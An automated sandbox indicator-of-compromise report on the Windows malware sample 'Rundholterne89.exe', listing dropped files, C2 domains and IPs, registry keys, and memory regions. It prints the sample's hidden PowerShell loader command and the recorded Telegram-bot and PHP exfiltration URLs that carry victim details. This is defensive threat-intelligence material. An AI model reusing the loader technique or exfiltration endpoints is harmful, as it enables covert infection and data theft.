IOC Report
Rundholterne89.exe

loading gif

Files

File Path
Type
Category
Malicious
Rundholterne89.exe
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
initial sample
malicious
C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Levitator\Exungulate.Spe205
ASCII text, with very long lines (3437), with CRLF, LF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Levitator\Lrerkrfter\Rundholterne89.exe
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
dropped
malicious
C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Levitator\Lrerkrfter\Rundholterne89.exe:Zone.Identifier
ASCII text, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
modified
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k2m4ibxf.4lq.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rffvel3l.nur.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rmdalg0o.rwe.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u3dfwlvy.5b5.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Levitator\Lrerkrfter\aktivitetsrunde.txt
ASCII text, with very long lines (360), with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Levitator\Lrerkrfter\discourteously.gam
GTA audio index data (SDT)
dropped
C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Levitator\Lrerkrfter\psychograph.rut
data
dropped
C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Levitator\Lrerkrfter\strudsfjerenes.uns
data
dropped
C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Levitator\Lrerkrfter\unnamed.jpg
JPEG image data, JFIF standard 1.02, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 512x512, components 3
dropped
C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Levitator\Sekundrlitteraturers.Non
data
dropped
There are 5 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\Rundholterne89.exe
"C:\Users\user\Desktop\Rundholterne89.exe"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -windowstyle hidden "$Ungarnsopholdet197=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Levitator\Exungulate.Spe205';$Ratanhia=$Ungarnsopholdet197.SubString(55438,3);.$Ratanhia($Ungarnsopholdet197)"
malicious
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\SysWOW64\msiexec.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

URLs

Name
IP
Malicious
https://reallyfreegeoip.org/xml/173.254.250.76$
unknown
https://www.office.com/
unknown
https://duckduckgo.com/chrome_newtab
unknown
http://nuget.org/NuGet.exe
unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:472847%0D%0ADate%20a
unknown
https://duckduckgo.com/ac/?q=
unknown
https://api.telegram.org
unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico
unknown
http://pesterbdd.com/images/Pester.png
unknown
https://api.telegram.org/bot
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://contoso.com/License
unknown
https://www.office.com/lB
unknown
https://contoso.com/Icon
unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
unknown
https://drive.usercontent.google.com/
unknown
https://reallyfreegeoip.org/xml/173.254.250.76
188.114.97.3
http://checkip.dyndns.org
unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
unknown
http://nsis.sf.net/NSIS_ErrorError
unknown
http://smtp.ionos.es
unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=
unknown
https://chrome.google.com/webstore?hl=en
unknown
https://www.ecosia.org/newtab/
unknown
http://varders.kozow.com:8081
unknown
https://github.com/Pester/Pester
unknown
http://aborters.duckdns.org:8081
unknown
https://ac.ecosia.org/autocomplete?q=
unknown
https://www.google.com
unknown
http://checkip.dyndns.org/
193.122.130.0
http://nsis.sf.net/NSIS_Error
unknown
http://51.38.247.67:8081/_send_.php?L
unknown
https://aka.ms/pscore6lB
unknown
https://drive.google.com/
unknown
http://anotherarmy.dns.army:8081
unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://chrome.google.com/webstore?hl=enlB
unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:472847%0D%0ADate%20and%20Time:%2022/10/2024%20/%2022:38:31%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20472847%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D
149.154.167.220
https://reallyfreegeoip.org
unknown
https://drive.google.com/l
unknown
https://apis.google.com
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
unknown
https://reallyfreegeoip.org/xml/
unknown
There are 36 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
reallyfreegeoip.org
188.114.97.3
malicious
smtp.ionos.es
213.165.67.118
malicious
api.telegram.org
149.154.167.220
malicious
checkip.dyndns.org
unknown
malicious
drive.google.com
142.250.185.174
drive.usercontent.google.com
142.250.186.65
checkip.dyndns.com
193.122.130.0

IPs

IP
Domain
Country
Malicious
149.154.167.220
api.telegram.org
United Kingdom
malicious
188.114.97.3
reallyfreegeoip.org
European Union
malicious
213.165.67.118
smtp.ionos.es
Germany
malicious
142.250.185.174
drive.google.com
United States
193.122.130.0
checkip.dyndns.com
United States
142.250.186.65
drive.usercontent.google.com
United States

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
FileDirectory
There are 5 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
23211000
trusted library allocation
page read and write
malicious
936D000
direct allocation
page execute and read and write
malicious
23200000
heap
page execute and read and write
56FB000
trusted library allocation
page read and write
390000
heap
page read and write
4B0000
heap
page read and write
230F0000
trusted library allocation
page read and write
25E20000
trusted library allocation
page read and write
2760000
trusted library allocation
page read and write
245A7000
trusted library allocation
page read and write
25E50000
trusted library allocation
page read and write
230F0000
trusted library allocation
page read and write
254A6000
heap
page read and write
7AB0000
trusted library allocation
page execute and read and write
25E00000
trusted library allocation
page read and write
230F0000
trusted library allocation
page read and write
25E00000
trusted library allocation
page read and write
232AC000
trusted library allocation
page read and write
79D0000
trusted library allocation
page read and write
230F0000
trusted library allocation
page read and write
22DCF000
stack
page read and write
25F50000
trusted library allocation
page read and write
20AE000
stack
page read and write
25E20000
trusted library allocation
page read and write
228E000
stack
page read and write
25E20000
trusted library allocation
page read and write
25E00000
trusted library allocation
page read and write
25E20000
trusted library allocation
page read and write
230F0000
trusted library allocation
page read and write
231F0000
trusted library allocation
page read and write
24280000
trusted library allocation
page read and write
24616000
trusted library allocation
page read and write
6DC0000
trusted library allocation
page execute and read and write
231F0000
trusted library allocation
page read and write
701B000
stack
page read and write
2838000
trusted library allocation
page read and write
19A000
stack
page read and write
6F80000
trusted library allocation
page read and write
8E0000
direct allocation
page read and write
23486000
trusted library allocation
page read and write
2FA000
trusted library allocation
page execute and read and write
2762000
trusted library allocation
page read and write
22D8E000
stack
page read and write
2462C000
trusted library allocation
page read and write
230F0000
trusted library allocation
page read and write
261F0000
trusted library allocation
page read and write
25E00000
trusted library allocation
page read and write
230F0000
trusted library allocation
page read and write
25440000
heap
page read and write
6EE000
heap
page read and write
2444C000
trusted library allocation
page read and write
230F0000
trusted library allocation
page read and write
244E5000
trusted library allocation
page read and write
233F4000
trusted library allocation
page read and write
23502000
trusted library allocation
page read and write
26220000
trusted library allocation
page read and write
2309E000
trusted library allocation
page read and write
261D0000
trusted library allocation
page read and write
261C0000
trusted library allocation
page read and write
87F0000
trusted library allocation
page execute and read and write
25E20000
trusted library allocation
page read and write
46A6000
trusted library allocation
page read and write
7A10000
heap
page read and write
230F0000
trusted library allocation
page read and write
25E20000
trusted library allocation
page read and write
6B20000
heap
page read and write
2437D000
trusted library allocation
page read and write
233F0000
trusted library allocation
page read and write
230C0000
trusted library allocation
page read and write
25E00000
trusted library allocation
page read and write
2308E000
trusted library allocation
page read and write
230F0000
trusted library allocation
page read and write
24239000
trusted library allocation
page read and write
8160000
trusted library allocation
page read and write
8000000
trusted library allocation
page read and write
2760000
heap
page read and write
2C0000
trusted library allocation
page read and write
230F0000
trusted library allocation
page read and write
232C4000
trusted library allocation
page read and write
230F0000
trusted library allocation
page read and write
2422B000
trusted library allocation
page read and write
233FF000
trusted library allocation
page read and write
23100000
trusted library allocation
page read and write
80F000
stack
page read and write
230A6000
trusted library allocation
page read and write
261B0000
trusted library allocation
page read and write
230F0000
trusted library allocation
page read and write
2400000
heap
page read and write
252B0000
heap
page read and write
580000
heap
page read and write
231F0000
trusted library allocation
page read and write
24402000
trusted library allocation
page read and write
56EC000
trusted library allocation
page read and write
254F9000
heap
page read and write
2350C000
trusted library allocation
page read and write
23100000
trusted library allocation
page read and write
232C0000
trusted library allocation
page read and write
7F390000
trusted library allocation
page execute and read and write
644000
heap
page read and write
230F0000
trusted library allocation
page read and write
230F0000
trusted library allocation
page read and write
549D000
remote allocation
page execute and read and write
25E20000
trusted library allocation
page read and write
CB0000
direct allocation
page read and write
7F2E000
stack
page read and write
648000
heap
page read and write
79A4000
stack
page read and write
23287000
trusted library allocation
page read and write
25F50000
trusted library allocation
page read and write
6630000
direct allocation
page read and write
6B2F000
heap
page read and write
25E30000
trusted library allocation
page read and write
43E5000
heap
page execute and read and write
4BCF000
trusted library allocation
page read and write
24295000
trusted library allocation
page read and write
230F0000
trusted library allocation
page read and write
25E00000
trusted library allocation
page read and write
22C2E000
stack
page read and write
23100000
trusted library allocation
page read and write
CA0000
direct allocation
page read and write
2348F000
trusted library allocation
page read and write
231F0000
trusted library allocation
page read and write
25E10000
trusted library allocation
page read and write
25E50000
trusted library allocation
page read and write
25E20000
trusted library allocation
page read and write
43E0000
heap
page execute and read and write
22DE0000
direct allocation
page read and write
232F3000
trusted library allocation
page read and write
25E00000
trusted library allocation
page read and write
25FB2000
trusted library allocation
page read and write
230F0000
trusted library allocation
page read and write
22AFD000
stack
page read and write
7B20000
trusted library allocation
page read and write
231F0000
trusted library allocation
page read and write
310000
trusted library allocation
page execute and read and write
22ABF000
stack
page read and write
281E000
stack
page read and write
25DF0000
trusted library allocation
page execute and read and write
25E20000
trusted library allocation
page read and write
230F0000
trusted library allocation
page read and write
2469E000
trusted library allocation
page read and write
230F0000
trusted library allocation
page read and write
25F50000
trusted library allocation
page read and write
25E20000
trusted library allocation
page read and write
230F0000
trusted library allocation
page read and write
5E9D000
remote allocation
page execute and read and write
23110000
trusted library allocation
page read and write
22E60000
trusted library allocation
page read and write
6AC000
heap
page read and write
25E30000
trusted library allocation
page execute and read and write
24581000
trusted library allocation
page read and write
A76D000
direct allocation
page execute and read and write
2DD000
trusted library allocation
page execute and read and write
42B000
unkown
page read and write
243DA000
trusted library allocation
page read and write
233FA000
trusted library allocation
page read and write
22690000
direct allocation
page read and write
2720000
trusted library allocation
page read and write
25E20000
trusted library allocation
page read and write
233C9000
trusted library allocation
page read and write
66B0000
direct allocation
page read and write
230F0000
trusted library allocation
page read and write
2E0000
trusted library allocation
page read and write
25E00000
trusted library allocation
page read and write
7E20000
trusted library allocation
page read and write
25F50000
trusted library allocation
page read and write
230F0000
trusted library allocation
page read and write
230F0000
trusted library allocation
page read and write
230F0000
trusted library allocation
page read and write
230F0000
trusted library allocation
page read and write
6DA0000
trusted library allocation
page read and write
230F0000
trusted library allocation
page read and write
24461000
trusted library allocation
page read and write
43CE000
stack
page read and write
230F0000
trusted library allocation
page read and write
230F0000
trusted library allocation
page read and write
230F0000
trusted library allocation
page read and write
25E20000
trusted library allocation
page read and write
261D0000
trusted library allocation
page read and write
25E00000
trusted library allocation
page read and write
302000
trusted library allocation
page read and write
25E20000
trusted library allocation
page read and write
6FA0000
trusted library allocation
page read and write
25F50000
trusted library allocation
page read and write
25E20000
trusted library allocation
page read and write
25E20000
trusted library allocation
page read and write
2ED000
trusted library allocation
page execute and read and write
25E20000
trusted library allocation
page read and write
230D0000
trusted library allocation
page read and write
230F0000
trusted library allocation
page read and write
23480000
trusted library allocation
page read and write
253EE000
stack
page read and write
25E20000
trusted library allocation
page read and write
26200000
trusted library allocation
page read and write
8F0000
heap
page read and write
3F0000
direct allocation
page read and write
261C0000
trusted library allocation
page read and write
2348A000
trusted library allocation
page read and write
230C0000
trusted library allocation
page read and write
6F0D000
stack
page read and write
27CE000
stack
page read and write
230F0000
trusted library allocation
page read and write
23317000
trusted library allocation
page read and write
22C6F000
stack
page read and write
7C00000
heap
page read and write
66D0000
direct allocation
page read and write
20FE000
stack
page read and write
25478000
heap
page read and write
25453000
heap
page read and write
25E00000
trusted library allocation
page read and write
28A0000
heap
page read and write
23100000
trusted library allocation
page read and write
7C2C000
heap
page read and write
25F50000
trusted library allocation
page read and write
243EF000
trusted library allocation
page read and write
230C0000
trusted library allocation
page read and write
244D6000
trusted library allocation
page read and write
19E000
stack
page read and write
2327E000
trusted library allocation
page read and write
231AE000
stack
page read and write
261B0000
trusted library allocation
page read and write
23116000
trusted library allocation
page read and write
25F60000
trusted library allocation
page read and write
6BDE000
heap
page read and write
25E00000
trusted library allocation
page read and write
230F0000
trusted library allocation
page read and write
230F0000
trusted library allocation
page read and write
7E05000
trusted library allocation
page read and write
24574000
trusted library allocation
page read and write
230C0000
trusted library allocation
page read and write
5579000
trusted library allocation
page read and write
230F0000
trusted library allocation
page read and write
4D1000
heap
page read and write
23110000
trusted library allocation
page read and write
6E4E000
stack
page read and write
230F1000
trusted library allocation
page read and write
25E20000
trusted library allocation
page read and write
25E20000
trusted library allocation
page read and write
355000
heap
page read and write
232B8000
trusted library allocation
page read and write
233AC000
trusted library allocation
page read and write
440000
unkown
page read and write
242F2000
trusted library allocation
page read and write
6B10000
heap
page execute and read and write
6B95000
heap
page read and write
25E20000
trusted library allocation
page read and write
230F0000
trusted library allocation
page read and write
25F50000
trusted library allocation
page read and write
25E00000
trusted library allocation
page read and write
261C0000
trusted library allocation
page read and write
230F0000
trusted library allocation
page read and write
42F000
unkown
page read and write
25F86000
trusted library allocation
page read and write
2458E000
trusted library allocation
page read and write
25E20000
trusted library allocation
page read and write
25E20000
trusted library allocation
page read and write
7E17000
trusted library allocation
page read and write
6D30000
trusted library allocation
page read and write
7F50000
trusted library allocation
page read and write
7EEE000
stack
page read and write
23389000
trusted library allocation
page read and write
230F1000
trusted library allocation
page read and write
25E20000
trusted library allocation
page read and write
6B5000
heap
page read and write
25F50000
trusted library allocation
page read and write
23508000
trusted library allocation
page read and write
23114000
trusted library allocation
page read and write
233C1000
trusted library allocation
page read and write
25F50000
trusted library allocation
page read and write
230F0000
trusted library allocation
page read and write
2573E000
stack
page read and write
7FE0000
trusted library allocation
page execute and read and write
87DF000
stack
page read and write
25F50000
trusted library allocation
page read and write
25E20000
trusted library allocation
page read and write
2240000
heap
page read and write
25E20000
trusted library allocation
page read and write
2325C000
trusted library allocation
page read and write
6B5000
heap
page read and write
25F50000
trusted library allocation
page read and write
7E10000
trusted library allocation
page read and write
22B7D000
stack
page read and write
25F64000
trusted library allocation
page read and write
9C000
stack
page read and write
231F0000
trusted library allocation
page read and write
3F40000
remote allocation
page execute and read and write
25E00000
trusted library allocation
page read and write
2311A000
trusted library allocation
page read and write
230C0000
trusted library allocation
page read and write
231F0000
trusted library allocation
page read and write
DD000
stack
page read and write
23643000
trusted library allocation
page read and write
4540000
heap
page execute and read and write
C90000
direct allocation
page read and write
230F0000
trusted library allocation
page read and write
25E00000
trusted library allocation
page read and write
7F70000
trusted library allocation
page read and write
6FC0000
trusted library allocation
page read and write
7FC2000
trusted library allocation
page read and write
25E50000
trusted library allocation
page execute and read and write
24224000
trusted library allocation
page read and write
232C8000
trusted library allocation
page read and write
25E00000
trusted library allocation
page read and write
25E2F000
trusted library allocation
page read and write
25E20000
trusted library allocation
page read and write
244C0000
trusted library allocation
page read and write
600000
direct allocation
page read and write
23100000
trusted library allocation
page read and write
668000
heap
page read and write
257BF000
stack
page read and write
230D0000
trusted library allocation
page read and write
2245000
heap
page read and write
234EC000
trusted library allocation
page read and write
24211000
trusted library allocation
page read and write
22CAD000
stack
page read and write
25E20000
trusted library allocation
page read and write
357000
heap
page read and write
23100000
trusted library allocation
page read and write
230C0000
trusted library allocation
page read and write
7CFD000
heap
page read and write
25E20000
trusted library allocation
page read and write
231F0000
trusted library allocation
page read and write
22F48000
trusted library allocation
page read and write
245AC000
trusted library allocation
page read and write
23488000
trusted library allocation
page read and write
25E20000
trusted library allocation
page read and write
230C0000
trusted library allocation
page read and write
25E00000
trusted library allocation
page read and write
26210000
trusted library allocation
page read and write
407000
unkown
page readonly
230D0000
trusted library allocation
page read and write
254A5000
heap
page read and write
401000
unkown
page execute read
22D50000
remote allocation
page read and write
4B5000
heap
page read and write
3B0000
heap
page read and write
25E20000
trusted library allocation
page read and write
230D0000
trusted library allocation
page read and write
231F0000
trusted library allocation
page read and write
25E30000
trusted library allocation
page read and write
231F0000
trusted library allocation
page read and write
234FD000
trusted library allocation
page read and write
25E20000
trusted library allocation
page read and write
96000
stack
page read and write
6B74000
heap
page read and write
230E0000
trusted library allocation
page read and write
25E20000
trusted library allocation
page read and write
25E00000
trusted library allocation
page read and write
230F0000
trusted library allocation
page read and write
24595000
trusted library allocation
page read and write
230F0000
trusted library allocation
page read and write
25E00000
trusted library allocation
page read and write
22EFE000
stack
page read and write
24568000
trusted library allocation
page read and write
261C0000
trusted library allocation
page read and write
25F50000
trusted library allocation
page read and write
6700000
direct allocation
page read and write
230F0000
trusted library allocation
page read and write
444E000
stack
page read and write
8170000
heap
page read and write
25478000
heap
page read and write
79B0000
heap
page read and write
230F0000
trusted library allocation
page read and write
230F0000
trusted library allocation
page read and write
261F0000
trusted library allocation
page read and write
230C0000
trusted library allocation
page read and write
261D0000
trusted library allocation
page read and write
230C0000
trusted library allocation
page read and write
230F0000
trusted library allocation
page read and write
D8000
stack
page read and write
25E20000
trusted library allocation
page read and write
305000
trusted library allocation
page execute and read and write
25E40000
trusted library allocation
page read and write
7B40000
trusted library allocation
page read and write
25E00000
trusted library allocation
page read and write
25E10000
trusted library allocation
page read and write
79E0000
trusted library allocation
page read and write
246DB000
trusted library allocation
page read and write
7D4B000
heap
page read and write
600000
heap
page read and write
254D6000
heap
page read and write
25E20000
trusted library allocation
page read and write
2857000
heap
page read and write
230C0000
trusted library allocation
page read and write
25E20000
trusted library allocation
page read and write
261B0000
trusted library allocation
page read and write
6BF0000
heap
page read and write
24308000
trusted library allocation
page read and write
25E20000
trusted library allocation
page read and write
25F50000
trusted library allocation
page read and write
25E20000
trusted library allocation
page read and write
22670000
direct allocation
page read and write
448E000
stack
page read and write
25F50000
trusted library allocation
page read and write
27D0000
heap
page read and write
261D0000
trusted library allocation
page read and write
25E20000
trusted library allocation
page read and write
67F000
heap
page read and write
254D6000
heap
page read and write
4A9D000
remote allocation
page execute and read and write
25E00000
trusted library allocation
page read and write
586000
heap
page read and write
261C0000
trusted library allocation
page read and write
254D6000
heap
page read and write
44CD000
stack
page read and write
22EB7000
stack
page read and write
407000
unkown
page readonly
230F0000
trusted library allocation
page read and write
230F0000
trusted library allocation
page read and write
25F50000
trusted library allocation
page read and write
230F0000
trusted library allocation
page read and write
25E20000
trusted library allocation
page read and write
24430000
trusted library allocation
page read and write
254EC000
heap
page read and write
6A9000
heap
page read and write
233BF000
trusted library allocation
page read and write
25DAE000
stack
page read and write
6FB0000
trusted library allocation
page read and write
6F10000
trusted library allocation
page read and write
7C20000
heap
page read and write
231F0000
trusted library allocation
page read and write
6B5F000
heap
page read and write
25E50000
trusted library allocation
page read and write
230C0000
trusted library allocation
page read and write
25E20000
trusted library allocation
page read and write
25E20000
trusted library allocation
page read and write
440000
heap
page read and write
6ECE000
stack
page read and write
23460000
trusted library allocation
page read and write
25E50000
trusted library allocation
page read and write
23100000
trusted library allocation
page read and write
230F0000
trusted library allocation
page read and write
231EE000
stack
page read and write
22F3F000
stack
page read and write
2730000
trusted library allocation
page read and write
230F0000
trusted library allocation
page read and write
254B1000
heap
page read and write
25E20000
trusted library allocation
page read and write
BB6D000
direct allocation
page execute and read and write
150000
heap
page read and write
6A1E000
stack
page read and write
24286000
trusted library allocation
page read and write
230F0000
trusted library allocation
page read and write
22BE0000
trusted library allocation
page read and write
230F0000
trusted library allocation
page read and write
25E20000
trusted library allocation
page read and write
25E20000
trusted library allocation
page read and write
6640000
direct allocation
page read and write
231F0000
trusted library allocation
page read and write
6690000
direct allocation
page read and write
25EC0000
trusted library allocation
page read and write
25E20000
trusted library allocation
page read and write
261D0000
trusted library allocation
page read and write
2542D000
stack
page read and write
22E3A000
stack
page read and write
23506000
trusted library allocation
page read and write
231F0000
trusted library allocation
page read and write
245B1000
trusted library allocation
page read and write
7D95000
heap
page read and write
2308B000
trusted library allocation
page read and write
2D4000
trusted library allocation
page read and write
2249000
heap
page read and write
261B0000
trusted library allocation
page read and write
230C0000
trusted library allocation
page read and write
24279000
trusted library allocation
page read and write
261A7000
trusted library allocation
page read and write
25E50000
trusted library allocation
page read and write
24298000
trusted library allocation
page read and write
25F50000
trusted library allocation
page read and write
25E20000
trusted library allocation
page read and write
25E00000
trusted library allocation
page read and write
2F6000
trusted library allocation
page execute and read and write
B16D000
direct allocation
page execute and read and write
25E00000
trusted library allocation
page read and write
671000
heap
page read and write
25DEE000
stack
page read and write
230C0000
trusted library allocation
page read and write
2307E000
stack
page read and write
230E0000
trusted library allocation
page read and write
238F000
stack
page read and write
230F0000
trusted library allocation
page read and write
246DF000
trusted library allocation
page read and write
231F0000
trusted library allocation
page read and write
25E20000
trusted library allocation
page read and write
87E0000
trusted library allocation
page execute and read and write
23020000
trusted library allocation
page read and write
307000
trusted library allocation
page execute and read and write
261B0000
trusted library allocation
page read and write
6F5000
heap
page read and write
231F0000
trusted library allocation
page read and write
230F0000
trusted library allocation
page read and write
2D0000
trusted library allocation
page read and write
7E00000
trusted library allocation
page read and write
6B00000
trusted library allocation
page read and write
25E20000
trusted library allocation
page read and write
5559000
trusted library allocation
page read and write
729D000
remote allocation
page execute and read and write
230A1000
trusted library allocation
page read and write
230C0000
trusted library allocation
page read and write
25E20000
trusted library allocation
page read and write
231F0000
trusted library allocation
page read and write
690000
trusted library section
page read and write
6F50000
trusted library allocation
page read and write
23080000
trusted library allocation
page read and write
6BA9000
heap
page read and write
3A0000
heap
page readonly
25E20000
trusted library allocation
page read and write
230D0000
trusted library allocation
page read and write
25E50000
trusted library allocation
page read and write
448000
heap
page read and write
5EE000
stack
page read and write
25F60000
trusted library allocation
page read and write
230D0000
trusted library allocation
page read and write
4DB000
heap
page read and write
617000
heap
page read and write
6FE000
heap
page read and write
6B4D000
heap
page read and write
230F0000
trusted library allocation
page read and write
23100000
trusted library allocation
page read and write
226A0000
direct allocation
page read and write
261D0000
trusted library allocation
page read and write
25E40000
trusted library allocation
page read and write
230F0000
trusted library allocation
page read and write
231F0000
trusted library allocation
page read and write
230D6000
trusted library allocation
page read and write
230C0000
trusted library allocation
page read and write
450B000
stack
page read and write
2414000
heap
page read and write
63A000
heap
page read and write
25E20000
trusted library allocation
page read and write
230F0000
trusted library allocation
page read and write
25E50000
trusted library allocation
page read and write
43E000
stack
page read and write
25E50000
trusted library allocation
page read and write
230F0000
trusted library allocation
page read and write
689D000
remote allocation
page execute and read and write
230F0000
trusted library allocation
page read and write
69A000
heap
page read and write
2429D000
trusted library allocation
page read and write
230F0000
trusted library allocation
page read and write
2301C000
stack
page read and write
230F0000
trusted library allocation
page read and write
7CD7000
heap
page read and write
230F0000
trusted library allocation
page read and write
6680000
direct allocation
page read and write
25E00000
trusted library allocation
page read and write
670000
heap
page read and write
289C000
stack
page read and write
230F0000
trusted library allocation
page read and write
434000
unkown
page read and write
231F0000
trusted library allocation
page read and write
252B1000
heap
page read and write
232B0000
trusted library allocation
page read and write
231F0000
trusted library allocation
page read and write
2309A000
trusted library allocation
page read and write
25E30000
trusted library allocation
page read and write
275A000
trusted library allocation
page execute and read and write
23100000
trusted library allocation
page read and write
254E1000
heap
page read and write
256FE000
stack
page read and write
230F0000
trusted library allocation
page read and write
9D6D000
direct allocation
page execute and read and write
231F0000
trusted library allocation
page read and write
357000
heap
page read and write
452000
unkown
page readonly
6F60000
trusted library allocation
page read and write
230F0000
trusted library allocation
page read and write
2442D000
trusted library allocation
page read and write
25E20000
trusted library allocation
page read and write
25E20000
trusted library allocation
page read and write
233CE000
trusted library allocation
page read and write
233F2000
trusted library allocation
page read and write
7A6D000
stack
page read and write
25F50000
trusted library allocation
page read and write
25E20000
trusted library allocation
page read and write
658E000
stack
page read and write
232CC000
trusted library allocation
page read and write
4AA6000
trusted library allocation
page read and write
55BC000
trusted library allocation
page read and write
6F70000
trusted library allocation
page read and write
5551000
trusted library allocation
page read and write
230F0000
trusted library allocation
page read and write
25E50000
trusted library allocation
page read and write
25E00000
trusted library allocation
page read and write
7AF5000
trusted library allocation
page read and write
25E00000
trusted library allocation
page read and write
230F0000
trusted library allocation
page read and write
25E00000
trusted library allocation
page read and write
230D0000
trusted library allocation
page read and write
25E20000
trusted library allocation
page read and write
6DB0000
trusted library allocation
page read and write
22680000
direct allocation
page read and write
230F0000
trusted library allocation
page read and write
66E000
heap
page read and write
230F0000
trusted library allocation
page read and write
25E20000
trusted library allocation
page read and write
22A7E000
stack
page read and write
446000
unkown
page readonly
230F0000
trusted library allocation
page read and write
27D9000
heap
page read and write
6B5D000
heap
page read and write
6F90000
trusted library allocation
page read and write
5576000
trusted library allocation
page read and write
4551000
trusted library allocation
page read and write
6F40000
trusted library allocation
page read and write
230F0000
trusted library allocation
page read and write
23493000
trusted library allocation
page read and write
261D0000
trusted library allocation
page read and write
230F0000
trusted library allocation
page read and write
25E40000
trusted library allocation
page execute and read and write
230F0000
trusted library allocation
page read and write
245CA000
trusted library allocation
page read and write
7E1B000
trusted library allocation
page read and write
25E50000
trusted library allocation
page read and write
23269000
trusted library allocation
page read and write
230F0000
trusted library allocation
page read and write
2A10000
trusted library allocation
page read and write
400000
unkown
page readonly
6BE3000
heap
page read and write
261D0000
trusted library allocation
page read and write
610000
heap
page read and write
7F60000
trusted library allocation
page read and write
2765000
trusted library allocation
page execute and read and write
23100000
trusted library allocation
page read and write
261B0000
trusted library allocation
page read and write
43D0000
trusted library allocation
page execute and read and write
25E20000
trusted library allocation
page read and write
6FA000
heap
page read and write
22E40000
trusted library allocation
page read and write
25E20000
trusted library allocation
page read and write
231F0000
trusted library allocation
page read and write
25E20000
trusted library allocation
page read and write
79C0000
trusted library allocation
page execute and read and write
25E20000
trusted library allocation
page read and write
23030000
heap
page read and write
22D50000
remote allocation
page read and write
230F0000
trusted library allocation
page read and write
66A0000
direct allocation
page read and write
234BC000
trusted library allocation
page read and write
528000
heap
page read and write
230F0000
trusted library allocation
page read and write
231F0000
trusted library allocation
page read and write
230F0000
trusted library allocation
page read and write
6D50000
trusted library allocation
page read and write
23100000
trusted library allocation
page read and write
6670000
direct allocation
page read and write
230D0000
trusted library allocation
page read and write
26210000
trusted library allocation
page read and write
